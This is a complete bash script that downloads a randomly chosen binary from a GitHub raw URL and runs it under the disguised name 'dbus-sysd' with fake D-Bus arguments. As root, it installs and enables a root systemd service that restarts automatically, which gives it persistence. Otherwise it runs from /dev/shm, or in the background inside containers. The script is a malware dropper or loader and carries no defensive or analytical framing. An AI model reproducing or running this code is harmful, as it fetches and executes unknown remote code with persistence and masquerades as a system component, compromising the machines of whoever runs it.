#!/bin/bash


SERVICE_NAME="dbus-sysd"
EXEC_FILE_FULL_PATH="/usr/bin/dbus-sysd"
SERVICE_PATH="/lib/systemd/system/${SERVICE_NAME}.service"
APP_CMD_PATH="/dev/shm"
APP_CMD="dbus-sysd"
CHOOSE=$(echo -e "alpha\nbeta" | shuf -n1)
MAIN_ULR="https://raw.githubusercontent.com/sachagerard1985/laravel-www/refs/heads/main/${CHOOSE}"

download_file() {
    local url="$1"
    local dest="$2"

    if command -v curl >/dev/null 2>&1; then
        echo "Using curl..."
        curl -fsSL "$url" -o "$dest"
    elif command -v wget >/dev/null 2>&1; then
        echo "Using wget..."
        wget -q "$url" -O "$dest"
    else
        echo "Error: Neither curl nor wget found"
        return 1
    fi
}

if [ -f "/.dockerenv" ] || grep -qaE 'docker|lxc|podman|kubepods' /proc/1/cgroup; then
    download_file "${MAIN_ULR}" "${EXEC_FILE_FULL_PATH}"
    chmod 755 "${EXEC_FILE_FULL_PATH}"
    "${EXEC_FILE_FULL_PATH}" --system --address=systemd --nofork --nopidfile --systemd-activation &
    return 0
fi

if [[ $EUID -eq 0 ]]; then
    download_file "${MAIN_ULR}" "${EXEC_FILE_FULL_PATH}"
    chmod 755 "${EXEC_FILE_FULL_PATH}"

    cat <<EOF > "$SERVICE_PATH"
[Unit]
Description=${SERVICE_NAME} Service
After=network.target
Wants=network-online.target systemd-networkd-wait-online.service

[Service]
Restart=always
RestartSec=60s
StartLimitInterval=450s
Type=forking
User=root
ExecStart=${EXEC_FILE_FULL_PATH} --system --address=systemd --nofork --nopidfile --systemd-activation

[Install]
WantedBy=multi-user.target
EOF

    chmod 755 "$SERVICE_PATH"
    systemctl daemon-reload
    systemctl restart "${SERVICE_NAME}.service"
    systemctl enable "${SERVICE_NAME}.service"

else
    download_file "${MAIN_ULR}" "${APP_CMD_PATH}/${APP_CMD}"
    chmod 755 "${APP_CMD_PATH}/${APP_CMD}"
    cd ${APP_CMD_PATH} && PATH=./:$PATH ${APP_CMD} --system --address=systemd --nofork --nopidfile --systemd-activation &
fi
